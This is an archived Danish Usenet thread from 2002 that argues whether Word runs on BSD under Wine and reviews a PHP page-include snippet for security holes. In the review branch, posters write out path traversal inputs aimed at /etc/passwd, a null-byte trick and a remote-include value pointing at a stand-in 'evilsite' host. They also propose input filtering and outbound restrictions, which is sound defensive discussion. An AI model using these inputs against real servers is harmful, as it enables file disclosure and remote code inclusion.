Eller, man kunne sige at grunden til at Word ikke kører på BSD er
at BSD ikke kan finde ud af at køre Windows' eksekverbare filer.
Det er da heller ikke Microsofts skyld.

> Det er der vel næppe nogen, der vil benægte?

Jo da, sagtens.

> At det så ikke hjælper ret meget, er en anden sag.

Ligegyldigt hvordan man vender og drejer den: nej, så hjælper det ikke
noget.

/L
--
Lasse Reichstein Nielsen - lrn@hotpop.com
'Faith without judgement merely degrades the spirit divine.'

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 10:00

Lasse Reichstein Nielsen wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> > Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.
>
> Nej da. Det er da lige så meget BSD-folkene der ikke har
> porteret/skrevet Word til BSD endnu. De ville nok blive nødt til at
> kalde det noget andet, men bliver det mindre Word af det?

Jeg kan komme i tanke om en række alternativer, der findes til Linux.
Jeg vil gætte på, at nogle af dem også findes til BSD: Staroffice,
Openoffice, Koffice og AbiWord.

>
> Eller, man kunne sige at grunden til at Word ikke kører på BSD er
> at BSD ikke kan finde ud af at køre Windows' eksekverbare filer.

Her kan man evt. bringe Wine ind i billedet. Kører Wine på BSD? Hvis
ikke, kan det muligvis skyldes en mangel i BSD. Hvis Wine kører, kan
det så også køre Word? Hvis ikke, hvorfor?

> Det er da heller ikke Microsofts skyld.

Hvis uoverensstemmelser mellem Microsofts beskrivelse af APIen og
Microsofts implementation af APIen er årsagen til, at Word ikke
kører under Wine, hvis skyld er det så?

>
> > Det er der vel næppe nogen, der vil benægte?
>
> Jo da, sagtens.

Ja, alt kan benægtes. Og Jorden er flad.

>
> > At det så ikke hjælper ret meget, er en anden sag.
>
> Ligegyldigt hvordan man vender og drejer den: nej, så hjælper det ikke
> noget.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (16-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 16-09-02 10:18

Kasper Dupont <kasperd@daimi.au.dk> writes:

>Hvis uoverensstemmelser mellem Microsofts beskrivelse af APIen og
>Microsofts implementation af APIen er årsagen til, at Word ikke
>kører under Wine, hvis skyld er det så?

Wine - hvis den påstår at kunne køre Windows-programmer. Fejl i
dokumentationen er ligemeget. Enten kan den - eller også kan den
ikke.

Mvh.
   Klaus.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 11:53

Klaus Ellegaard wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> >Hvis uoverensstemmelser mellem Microsofts beskrivelse af APIen og
> >Microsofts implementation af APIen er årsagen til, at Word ikke
> >kører under Wine, hvis skyld er det så?
>
> Wine - hvis den påstår at kunne køre Windows-programmer. Fejl i
> dokumentationen er ligemeget. Enten kan den - eller også kan den
> ikke.

Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
at det ikke er dokumentationen, der er rigtig og implementationen
af Word og Windows, der er forkert?

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (16-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 16-09-02 12:00

Kasper Dupont <kasperd@daimi.au.dk> writes:

>> Wine - hvis den påstår at kunne køre Windows-programmer. Fejl i
>> dokumentationen er ligemeget. Enten kan den - eller også kan den
>> ikke.

>Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
>at det ikke er dokumentationen, der er rigtig og implementationen
>af Word og Windows, der er forkert?

Så er det jo alligevel WINE, der er defekt. Årsagen er jo aldeles
underordnet. Enten kan den - eller også kan den ikke.

Mvh.
   Klaus.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 20:34

Klaus Ellegaard wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> >> Wine - hvis den påstår at kunne køre Windows-programmer. Fejl i
> >> dokumentationen er ligemeget. Enten kan den - eller også kan den
> >> ikke.
>
> >Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
> >at det ikke er dokumentationen, der er rigtig og implementationen
> >af Word og Windows, der er forkert?
>
> Så er det jo alligevel WINE, der er defekt.

Nej.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (16-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 16-09-02 20:50

Kasper Dupont <kasperd@daimi.au.dk> writes:

>> >Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
>> >at det ikke er dokumentationen, der er rigtig og implementationen
>> >af Word og Windows, der er forkert?
>>
>> Så er det jo alligevel WINE, der er defekt.

>Nej.

WINE emulerer Windows. Windows kan køre Word. WINE kan ikke
køre Word. Ergo kan WINE ikke emulere Windows. Det kan være,
at WINE i nogle tilfælde kan noget, der har en vis lighed med
Windows, men medmindre WINE kan præcis det samme som Windows,
vil jeg kalde det grundlæggende broken. Uanset årsagen hertil.

Mvh.
   Klaus.

Christian E. Lysel (16-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 16-09-02 20:52

Klaus Ellegaard wrote:
> WINE emulerer Windows. Windows kan køre Word. WINE kan ikke

Kan Windows køre Word, min går da ned en gang imellem :)


Kasper Dupont (17-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 17-09-02 12:08

Klaus Ellegaard wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> >> >Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
> >> >at det ikke er dokumentationen, der er rigtig og implementationen
> >> >af Word og Windows, der er forkert?
> >>
> >> Så er det jo alligevel WINE, der er defekt.
>
> >Nej.
>
> WINE emulerer Windows.

Nej, Wine implementerer Windows APIen.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Peter Brodersen (16-09-2002)
Kommentar
Fra : Peter Brodersen


Dato : 16-09-02 12:26

On Mon, 16 Sep 2002 12:53:28 +0200, Kasper Dupont
<kasperd@daimi.au.dk> wrote:

>Hvem siger, at fejlen ligger i dokumentationen? Er du sikker på,
>at det ikke er dokumentationen, der er rigtig og implementationen
>af Word og Windows, der er forkert?

Vi må vel forholde os til situationen. Din sekretær er lidt ligeglad
over hvad, der er årsagen.

--
- Peter Brodersen

Lasse Reichstein Nie~ (16-09-2002)
Kommentar
Fra : Lasse Reichstein Nie~


Dato : 16-09-02 10:41

Kasper Dupont <kasperd@daimi.au.dk> writes:

> Jeg kan komme i tanke om en række alternativer, der findes til Linux.
> Jeg vil gætte på, at nogle af dem også findes til BSD: Staroffice,
> Openoffice, Koffice og AbiWord.

Det gør de sikkert, undtagen Koffice findes de også til Windows.

Men kører Word på BSD? Og hvad er årsagen? (Nej (uden Wine i det
mindste), og fordi ingen har skrevet word til BSD, ikke kun fordi
Microsoft ikke har).

> Her kan man evt. bringe Wine ind i billedet. Kører Wine på BSD? Hvis
> ikke, kan det muligvis skyldes en mangel i BSD. Hvis Wine kører, kan
> det så også køre Word? Hvis ikke, hvorfor?

Den findes. Et hurtigt google(Wine,BSD) gav
<URL:http://librenix.com/?inode=1328>
Hvis den findes, så kan den nok også køre Word. Jeg mener Linux' Wine
kan køre Word.
Google(Wine,Word) giver
<URL:http://bmrc.berkeley.edu/people/chaffee/wine/word97snapshot.html>

> Hvis uoverensstemmelser mellem Microsofts beskrivelse af APIen og
> Microsofts implementation af APIen er årsagen til, at Word ikke
> kører under Wine, hvis skyld er det så?

Wines. Microsoft har aldrig lovet at deres egne programmer kun bruger
den dokumenterede API. API'en er det der er dokumenteret at virke og
som alle kan bruge. Om det så er så fedt, det må du spørge dem USA'nske
monopoldomstol om :).

> Ja, alt kan benægtes. Og Jorden er flad.

Og dette her kunne rimeligt benægtes, eller i det mindste affærdiges
som så vagt at det er svært at afgøre.

Jorden er kun lokalt isometrisk med et plan.

/L
--
Lasse Reichstein Nielsen - lrn@hotpop.com
'Faith without judgement merely degrades the spirit divine.'

N/A (15-09-2002)
Kommentar
Fra : N/A


Dato : 15-09-02 22:20



Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 22:20

"Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> writes:

>Klaus Ellegaard wrote:
>> har kun én pc. Hvis kan også skal kunne køre Word og spille, er
>> OpenBSD nok et rigtigt skidt valg. Fås der i øvrigt proprietære
>> USB-modem-drivere til OpenBSD?

>Snakker vi om sikkerhed eller spil?

Begge dele. På samme computer. Og et udmærket eksempel på dit
spørgsmål til Andreas.

Mvh.
   Klaus.

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 22:27

Klaus Ellegaard wrote:
>>Og har lavet en aftale med DMI om at han/hun godt må det? Hvis man
>>tegner en sådan aftale har man typisk råd til at bygge en ordenlig
>>infrastruktur.
> Så erstat DMI med www.gratis-data-til-at-proppe-paa-dit-website.dk
> eller noget andet. Det er jo ligegyldigt for diskussionen.

Nej, det er ikke ligegyldt om han har råd til betale DMI. Dette vil så
tyde på han også har råd til at købe en bedre infrastruktur.

>>Anyway, jeg ville nok i dette tilfælde vælge at kører OpenBSD med
>>systrace på webserveren. systrace ville jeg sætte op således at når
>>processen går på nettet må den kun lave http forspørgelser til DMI.
> Brugeren kører Windows - han kan ikke finde ud af andet, og han

Han kan ikke finde ud af andet? Hvis brugeren ikke kan finde ud af andet
holder mit påstand ..."Men at give webserveren fuld adgang til Internet,
det er en fejl."... stadigvæk. At han/hun ikke kan finde ud af det, er
en helt anden diskution.

> har kun én pc. Hvis kan også skal kunne køre Word og spille, er
> OpenBSD nok et rigtigt skidt valg. Fås der i øvrigt proprietære
> USB-modem-drivere til OpenBSD?

Kan du ikke kommer med et bedre eksempler... en bruger der vil kører CPU
tunge opgaver (spil og word) på en webserver. Hvad snakker vi om, spil
eller sikkerhed?

Findes der i øvrigt proprietære USB-modem-drivere til Windows?


Klaus Ellegaard (16-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 16-09-02 06:52

"Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> writes:

>> Brugeren kører Windows - han kan ikke finde ud af andet, og han

>Han kan ikke finde ud af andet? Hvis brugeren ikke kan finde ud af andet
>holder mit påstand ..."Men at give webserveren fuld adgang til Internet,
>det er en fejl."... stadigvæk. At han/hun ikke kan finde ud af det, er
>en helt anden diskution.

Din "fejl" har i så fald udviklet sig til et økonomisk mareridt
for folk med noget på hjertet. De skal ud og investere 20.000
kroner i en ekstra computer, ny internet-forbindelse, router og
ekspertise.

I teorien er det måske en fejl - i praksis er det standarden.

>Kan du ikke kommer med et bedre eksempler... en bruger der vil kører CPU
>tunge opgaver (spil og word) på en webserver. Hvad snakker vi om, spil
>eller sikkerhed?

Begge dele på én gang. Vores ven har ikke så mange penge.

>Findes der i øvrigt proprietære USB-modem-drivere til Windows?

Jeg har ikke kendskab til ét USB-modem uden Windows-drivere.

Mvh.
   Klaus.

Christian E. Lysel (16-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 16-09-02 07:54

Klaus Ellegaard wrote:
> Din "fejl" har i så fald udviklet sig til et økonomisk mareridt
> for folk med noget på hjertet. De skal ud og investere 20.000
> kroner i en ekstra computer, ny internet-forbindelse, router og
> ekspertise.

Mit setup herhjemme, var ikke et økonomisk mareridt. Maskinen var en
maskine der var defekt under windows (p133, 32mb ram, diskette drev, 1
netkort), derefter strippede jeg 2 maskiner der også var smidt ud, for
netværkskort. Byggede en floppy disk, smed den i maskinen, og den har nu
kørt i et år, uden problemer. På mit loft står endvidere en anden
firewall (486, ellers samme spec), der har kørt i 2 år, været udsat for
over 40 grader og under minus 10 grader, den kører upåvirket.

> I teorien er det måske en fejl - i praksis er det standarden.

I praksis er de fleste hjemmesetup med en bruger der ikke ved noget,
hullet som en si.

Det vil heller ikke hjælpe at anbefalde dem en personlig firewall, hvis
de ikke ved noget. En personlig firewall vil også kunne beskytte deres
webserver applikation imod at gå på internet.

>>Kan du ikke kommer med et bedre eksempler... en bruger der vil kører CPU
>>tunge opgaver (spil og word) på en webserver. Hvad snakker vi om, spil
>>eller sikkerhed?
> Begge dele på én gang. Vores ven har ikke så mange penge.

>>Findes der i øvrigt proprietære USB-modem-drivere til Windows?
> Jeg har ikke kendskab til ét USB-modem uden Windows-drivere.

Men hvad med proprietære Windows drivere :)


Michal Wodzinski (16-09-2002)
Kommentar
Fra : Michal Wodzinski


Dato : 16-09-02 08:47



Christian E. Lysel (16-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 16-09-02 09:07

Michal Wodzinski wrote:
>    $pageFound = @include "pages/" . $url . ".php";
> Kan den udnyttes?

Vil, link_somewhere?url=/etc/passwd , pege på ./pages//etc/passwd.php,
dvs. /etc/passwd.php?

Hvad med link_somewhere?url=/etc/passwd<null tegn> ?

Hvad med implementering af input validering?

Fx,

$url=preg_replace("/[^a-zA-Z0-9\-\.]/", "", $url); #fjern ugyldige tegn
$url=preg_replace("/\.\.+/", "", $url); #fjern gentagelser af .

Her vil link_somewhere?url=/etc/passwd pege på ./pages/etcpasswd og
link_somewhere?url=../../../etc/passwd vil pege på ./pages/.etcpasswd


Peter Brodersen (16-09-2002)
Kommentar
Fra : Peter Brodersen


Dato : 16-09-02 11:09

On Mon, 16 Sep 2002 10:06:53 +0200, "Christian E. Lysel"
<sunsite.dk.nntp@spindelnet.dk> wrote:

>Vil, link_somewhere?url=/etc/passwd , pege på ./pages//etc/passwd.php,
>dvs. /etc/passwd.php?

Bare for en god ordens skyld:

../pages//etc/passwd.php er lig med ./pages/etc/passwd.php, ikke
/etc/passwd.php

Til gengæld kan man dog blot normalt bruge ../ et stort antal gange,
også "for mange" gange for at komme ud i roden (selvfølgelig med
forbehold for basedir, safemode allow_url_fopen, etc.)

--
- Peter Brodersen

Christian E. Lysel (16-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 16-09-02 11:17

Peter Brodersen wrote:
> ./pages//etc/passwd.php er lig med ./pages/etc/passwd.php, ikke
> /etc/passwd.php

*suk*, ja.

Evt. kan der være problemer på windows hvor det kan blive tolket som \
er dog ikke sikker på om det er tilfælde med php-motoren.




Arne Schwerdtfegger (16-09-2002)
Kommentar
Fra : Arne Schwerdtfegger


Dato : 16-09-02 11:45

"Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> wrote:
> Hvad med link_somewhere?url=/etc/passwd<null tegn> ?

Så vidt jeg husker skrotter php selv ens poison nulls, de ender vist som \0
eller noget i den retning.

--
Knud

Arne Schwerdtfegger (16-09-2002)
Kommentar
Fra : Arne Schwerdtfegger


Dato : 16-09-02 11:39

Michal Wodzinski <michal@null.dk> wrote:
>> Det hjælper at slå ALLOW_URL_FOPEN fra hvis man alligevel ikke skal b
> ruge
>> det til noget..
>
> Hvad gør URL_FOPEN?

allow_url_fopen boolean
This option enables the URL-aware fopen wrappers that enable accessing
URL object like files. Default wrappers are provided for the access of
remote files using the ftp or http protocol, some extensions like zlib
may register additional wrappers.

> Min løsning er denne:
>
> link_somewhere?url=page
>
> og i koden, nøjagtigt der hvor hovedindholdet skal være:
>
> <?
> if ( $url == "" )
> {
> $url = "main";
> }
> $pageFound = @include "pages/" . $url . ".php";
> if (!$pageFound)
> {
> print "<p>unfortunately your requested page could not be
> found. please try again.</p>";
> }
> ?>
>
> Kan den udnyttes?

Eftersom du smider pages/ foran kan det blive svært...
flaf?page=http://evilsite/blah vil jo forsøge at include
pages/http://evilsite/blah.php, og det er ikke lige til at komme udenom
mig bekendt. At du selv smider .php på er dog ingen hjælp i
sikkerhedsmæssige henseender.

--
Knud

Michal Wodzinski (16-09-2002)
Kommentar
Fra : Michal Wodzinski


Dato : 16-09-02 08:52



Michal Wodzinski (16-09-2002)
Kommentar
Fra : Michal Wodzinski


Dato : 16-09-02 09:43



Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 11:48

Michal Wodzinski wrote:
>
> On Sun, 15 Sep 2002, Kasper Dupont wrote:
>
> >
> > Så det er nok bedst at lukke helt for webserverens mulighed for at
> > kontakte eksterne maskiner på nogen port.
>
> Hvordan vil du så include ting fra eksterne servere?

Hvis du har brug for det så luk op til de få nødvendige
addresser og ikke andre.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Michal Wodzinski (16-09-2002)
Kommentar
Fra : Michal Wodzinski


Dato : 16-09-02 21:06



Michael Andreasen (15-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 15-09-02 13:45

"Michael Andreasen" <maskinen2000@hotmail.com> wrote in message
news:alv3pa$5t7$1@sunsite.dk...
> Hvad i alverden gør man så nu?

Nu har jeg i alle tilfælde og sammen med et andet "angrebet" webhotel -
anmeldt det til vedkommendes ISP samt webhotel ISP og sendt info + logfiler
m.m. Så de selv rode videre med det.

Mvh
Michael Andreasen



Søg
Reklame
Statistik
Spørgsmål : 177560
Tips : 31968
Nyheder : 719565
Indlæg : 6408941
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste